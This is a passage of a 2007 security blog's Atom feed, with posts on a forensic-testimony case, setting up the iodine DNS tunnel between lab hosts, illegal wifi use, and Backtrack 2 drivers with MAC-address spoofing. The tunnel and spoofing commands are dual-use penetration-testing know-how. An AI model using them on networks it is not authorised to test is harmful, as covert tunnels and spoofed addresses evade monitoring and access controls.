href='http://www.blogger.com/feeds/6339171303043697983/posts/default/9212202384457981273'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/how-to-use-webspy-from-dsniff-suite.html' title='How to use Webspy from the dsniff suite'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-3689919724147246557</id><published>2007-06-14T21:24:00.000-07:00</published><updated>2007-06-14T21:25:58.567-07:00</updated><title type='text'>Due diligence?</title><content type='html'>&lt;p style="margin-bottom: 0in; font-family: verdana;" lang="en-US"&gt;&lt;span style="color:#000000;"&gt;&lt;span style="font-size:100%;"&gt;I have been reading the story referenced below and felt compelled to offer up yet another opinion on the matter:&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="color:#000080;"&gt;&lt;u&gt;&lt;a href="http://www.securityfocus.com/news/11469?ref=rss"&gt;http://www.securityfocus.com/news/11469?ref=rss&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;It would seem that when a persons private and professional reputation are at stake a forensic investigation would strive to perform due diligence in regards to their investigative techniques including reporting.  I would think that this would cut down on “erroneous” forensic testimony.&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;For more details on the situations past and present please read the following blog posts:&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="color:#000080;"&gt;&lt;u&gt;&lt;a href="http://blog.wired.com/27bstroke6/2007/06/teacher_granted.html"&gt;http://blog.wired.com/27bstroke6/2007/06/teacher_granted.html&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="color:#000080;"&gt;&lt;u&gt;&lt;a href="http://blog.washingtonpost.com/securityfix/2007/06/substitute_teacher_granted_new.html"&gt;http://blog.washingtonpost.com/securityfix/2007/06/substitute_teacher_granted_new.html&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;I just don't even know where to begin here.  Suppressed evidence from the defense's technical witness? Failure of the local Teacher's Union to step forward and do the right thing?  The judge who criticized bloggers for trying to “improperly influence the court”?  This case is a very strong example of how much ignorance still exists concerning computers, malware, strong information security policies, proper training, etc.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-3689919724147246557?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/3689919724147246557/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=3689919724147246557&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/3689919724147246557'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/3689919724147246557'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/due-diligence.html' title='Due diligence?'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-8021530309394826334</id><published>2007-06-09T16:41:00.000-07:00</published><updated>2007-06-09T16:43:45.740-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='dns'/><category scheme='http://www.blogger.com/atom/ns#' term='iodine'/><category scheme='http://www.blogger.com/atom/ns#' term='pingtunnel'/><title type='text'>iodine and pingtunnel</title><content type='html'>&lt;p style="margin-bottom: 0in;"&gt;&lt;a name="st5"&gt;&lt;/a&gt;&lt;a name="st4"&gt;&lt;/a&gt;&lt;a name="st3"&gt;&lt;/a&gt;&lt;a name="st2"&gt;&lt;/a&gt;&lt;a name="st1"&gt;&lt;/a&gt;&lt;a name="st"&gt;&lt;/a&gt;&lt;span style="font-family: verdana;"&gt; Well I tried to go to bed last night at a decent time...guess it just&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;didn't work out.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;In any case I decided to experiment with some tunneling tools.  I'm&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;very interested in being able to tunnel traffic along covert channels&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;especially for testing/auditing purposes for a client.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;That being said I did a little searching around and found the two&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;tools listed in the subject of the blog.  I tried pingtunnel first&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;but couldn't get it to function in my test environment.  I sent an&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;information packed email to the softwares author and hope to hear&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;something in a timely fashion.  In the interim I decided that I would&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;give iodine a shot and see what I could get to work.  My preliminary&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;findings are below:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Start the server:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;-(igs-awilliams@IGS-DEV01:ttyp5)-(11 files:26k@iodine)-(0 jobs)-(19:36)-&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;-(~/iodine:$)-&gt; sudo /usr/local/sbin/iodined -f &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt; test.asdf&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Enter password on stdin:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;&lt;password&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Opened /dev/tun0&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Setting IP of tun0 to &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Adding route &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/24" target="_blank"&gt;172.16.0.1/24&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt; to &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;add net &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/24" target="_blank"&gt;172.16.0.1/24&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt;: gateway &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Setting MTU of tun0 to 1024&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Opened UDP socket&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Listening to dns for domain test.asdf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Verfiy that the tun/tap interface is enabled:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;tun0: flags=51&lt;up,pointopoint,running&gt; mtu 1024&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;       groups: tun&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;       inet &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt; --&gt; &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt; netmask 0xffffff00&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Ok...so far so good.  Now lets setup the client:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;igs-awilliams@IGS-LAP02:~&gt; sudo /usr/local/sbin/iodine -f &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://10.1.1.36/" target="_blank"&gt;10.1.1.36&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt; test.asdf&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Enter password on stdin:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;&lt;password&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Opened dns0&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Opened UDP socket&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Version ok, both running 0x00000400. You are user #0&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Setting IP of dns0 to &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.2/" target="_blank"&gt;172.16.0.2&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Setting MTU of dns0 to 1024&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Sending queries for test.asdf to &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://10.1.1.36/" target="_blank"&gt;10.1.1.36&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;The tun/tap interface was aptly named dns0 so lets check that its&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;been created correctly:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;dns0      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;         inet addr:&lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.2/" target="_blank"&gt;172.16.0.2&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt;  P-t-P:&lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.2/" target="_blank"&gt;172.16.0.2&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt;  Mask:&lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://255.255.255.0/" target="_blank"&gt;255.255.255.0&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;         UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1024  Metric:1&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;         RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;         TX packets:21 errors:0 dropped:0 overruns:0 carrier:0&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;         collisions:0 txqueuelen:10&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;         RX bytes:0 (0.0 b)  TX bytes:2153 (2.1 Kb)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;If all this works correctly I should be able to ping &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt; from&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.2/" target="_blank"&gt;172.16.0.2&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt; right?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;igs-awilliams@IGS-LAP02:~&gt; ping &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;PING &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt; (&lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt;) 56(84) bytes of data.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;64 bytes from &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt;: icmp_seq=1 ttl=255 time=18.1 ms&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;64 bytes from &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt;: icmp_seq=2 ttl=255 time=17.2 ms&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;64 bytes from &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt;: icmp_seq=3 ttl=255 time=17.3 ms&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;64 bytes from &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt;: icmp_seq=4 ttl=255 time=17.3 ms&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;64 bytes from &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt;: icmp_seq=5 ttl=255 time=17.4 ms&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;--- &lt;/span&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://172.16.0.1/" target="_blank"&gt;172.16.0.1&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: verdana;"&gt; ping statistics ---&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;5 packets transmitted, 5 received, 0% packet loss, time 4040ms&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;rtt min/avg/max/mdev = 17.201/17.491/18.108/0.339 ms&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Voila!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;NOTE: Usage of iodine makes use of the tun/tap driver of *nix&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;platforms.  Windows users need not apply.  The driver installs&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;standard on OpenBSD (the server in the example above) and requires a&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;kernel adjustment and compile on Linux (the client in the example).&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;For a list of supported OSes and platforms consult the following:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;color:#000080;" &gt;&lt;u&gt;&lt;a href="http://dev.kryo.se/iodine/wiki/SupportedPlatforms"&gt;http://dev.kryo.se/iodine/wiki/SupportedPlatforms&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;May Your Skill Prevail.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-8021530309394826334?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/8021530309394826334/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=8021530309394826334&amp;isPopup=true' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8021530309394826334'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8021530309394826334'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/iodine-and-pingtunnel.html' title='iodine and pingtunnel'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-2696706200723853161</id><published>2007-06-09T16:37:00.000-07:00</published><updated>2007-06-09T16:39:19.267-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='illlegal'/><category scheme='http://www.blogger.com/atom/ns#' term='precedent'/><category scheme='http://www.blogger.com/atom/ns#' term='wifi'/><title type='text'>Precedent case for illegal wifi usage</title><content type='html'>&lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;"&gt;I had to read the article below several times to try and wrap my mind around exactly what was taking place and the ramifications this would have.&lt;/p&gt;  &lt;p face="verdana" style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="color: rgb(0, 0, 128);"&gt;&lt;u&gt;&lt;a href="http://www.foxnews.com/story/0,2933,276720,00.html"&gt;http://www.foxnews.com/story/0,2933,276720,00.html&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="color: rgb(0, 0, 128);"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="text-decoration: none;"&gt;In my opinion a definite gray area in many ways.  It seems as if some sort of warning would be available that a breach of policy has occurred or that for enforcement of this law to be conditional that when a proprietor advertises free wireless it include a notification that it is for paying customers only.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="color: rgb(0, 0, 128);"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="text-decoration: none;"&gt;On the other hand one shouldn't connect to wireless access points without obtaining permission in advance.  In addition, it would seem that a prosecutors office would have more pressing cases to pursue than something like this other than cases that “fall into their lap”.  It would seem like enforcement of this law would be analogous to personal assault laws insofar that the victim (the coffee ship in this scenario) would need to press charges against defendant for the case to proceed forward.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="color: rgb(0, 0, 128);"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="text-decoration: none;"&gt;What are your thoughts? &lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-2696706200723853161?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/2696706200723853161/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=2696706200723853161&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/2696706200723853161'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/2696706200723853161'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/precedent-case-for-illegal-wifi-usage.html' title='Precedent case for illegal wifi usage'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-2504230459210607596</id><published>2007-06-08T00:22:00.001-07:00</published><updated>2008-12-11T01:34:29.897-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='AWUS036H'/><category scheme='http://www.blogger.com/atom/ns#' term='penetration testing'/><category scheme='http://www.blogger.com/atom/ns#' term='alfa'/><category scheme='http://www.blogger.com/atom/ns#' term='backtrack'/><title type='text'>Backtrack 2 and the Alfa Network AWUS036H</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Z4u4MkgQQuE/RmkD7p8RM3I/AAAAAAAAAAM/JzMzq2P_Vro/s1600-h/AWUS036H-70K.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://3.bp.blogspot.com/_Z4u4MkgQQuE/RmkD7p8RM3I/AAAAAAAAAAM/JzMzq2P_Vro/s320/AWUS036H-70K.jpg" alt="" id="BLOGGER_PHOTO_ID_5073590778615378802" border="0" /&gt;&lt;/a&gt; &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;&lt;span lang="en-US"&gt;One of the new features of Backtrack 2 is support for the &lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;&lt;span lang="en-US"&gt;Alfa Network AWUS036H.  This 802.11 wireless USB adapter sports power output of 500mW as is based off the Realtek 8187 chipset and uses the corresponding drivers.  Some of the highlights of this hardware in addition to its exceptional power levels are its Apple support and ability to be used in Backtrack via virtual machine software such as VMWare 6 (There are many reported issues with using VMWare 5 with this hardware).&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;If you have this adapter with Backtrack 2 using the default drivers provided with the distribution you have probably noticed lackluster connectivity and reliability.  This has been drastically improved with user released modules for Backtrack.  These modules not only address the shortcomings of the default drivers but also provide an upgrade path to the latest release of the famed aircrack-ng software including support for aircrack-ptw.&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;The latest version of these drivers can be found via the Backtrack 2 Community Forums:&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;"&gt;&lt;span style="color: rgb(0, 0, 128);font-size:100%;" &gt;&lt;u&gt;&lt;a href="http://forums.remote-exploit.org/showthread.php?t=6784&amp;highlight=alfa+modules"&gt;&lt;span lang="en-US"&gt;http://forums.remote-exploit.org/showthread.php?t=6784&amp;amp;highlight=alfa+modules&lt;/span&gt;&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Once you have obtained the modules in question the subsequent installation is straightforward and painless.  Documentation for the install is provided within the .zip archive.  Reading of the above mentioned forum thread is also highly recommended especially if you haven't previously installed modules under Backtrack 2.  &lt;/span&gt; &lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Once you have the modules installed you will need to unload the previous ones and load the new ones with using the following syntax:&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;&lt;span lang="en-US"&gt;igs-awilliams@igs-lap01# ifconfig wlan0 down&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;&lt;span lang="en-US"&gt;igs-awilliams@igs-lap01# rmmod r8187 &amp;&amp;amp; modprobe r8187&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;You should then be able to issue the following commands to bring up the adapter and perform MAC address spoofing (optional):&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;&lt;span lang="en-US"&gt;igs-awilliams@igs-lap01&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;&lt;span lang="en-US"&gt;# ifconfig wlan up&lt;br /&gt;igs-awilliams@igs-lap01# ifconfig wlan0 hw ether 00:11:22:33:44:55 &lt;/span&gt;&lt;/span&gt; &lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;From here the sky is the limit.  Kismet, the aircrack-ng suite, etc should function correctly as well as receiving accurate power levels from the driver.  In addition to this connectivty to access points should be possible as well.&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;One observation that I made was that Backtrack tended to have a kernel panic if the adapter was plugged in at boot time.  If you insert the adapter after boot and perform the necessary commands all should be well.&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;May Your Skill Prevail.&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-2504230459210607596?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/2504230459210607596/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=2504230459210607596&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/2504230459210607596'/><link rel='self' type='application/atom+xml' 